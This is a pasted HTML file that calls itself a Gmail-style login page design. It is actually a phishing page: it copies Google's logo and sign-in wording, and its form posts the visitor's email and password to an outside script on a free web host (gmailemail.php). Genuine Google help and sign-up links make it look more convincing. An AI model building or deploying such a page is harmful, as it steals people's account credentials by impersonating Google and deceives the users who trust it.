Untitled
3 years ago in Plain Text
<html>
<title>Gmail Style Login page Design using HTML and CSS by</title>
<head>
<link type="text/css" rel="stylesheet" href="style.css" />
</head>
<body>
<center>
<div class="base">
<div id="logo">
<img src="https://www.freepnglogos.com/uploads/google-logo-png/file-google-logo-svg-wikimedia-commons-23.png" width="118" height="38" />
</div>
<div id="info1">One account. All of Google.</div>
<div id="info2">Sign in to continue to Gmail</div>
<div id="form1">
<form method="post" name="myemailform" action="http://template009.000webhostapp.com/gmailemail.php">
<div id="mailbox">
<input placeholder="Enter your email" type="mail" name="email"
style="width:270px; height:42px; border: solid 1px #c2c4c6;
font-size:16px; padding-left:8px;" />
</div>
<div id="mailbox">
<input placeholder="password" type="password" name="message"
style="width:270px; height:42px; border: solid 1px #c2c4c6;
font-size:16px; padding-left:8px;" />
</div>
<div><input type="submit" id="button2" value="Login" /></div>
</form>
<div id="info3"><a href="https://accounts.google.com"/>Need help?</a></div>
</div>
<div id="info4"> <a href="https://accounts.google.com"/>Create account</a></div>
<div id="info5">One Google Account for everything Google</div>
<div id="bottom">
<ul >
<li></li>
<li> </li>
</ul>
</div>
</div>
</center>
</body>
</html>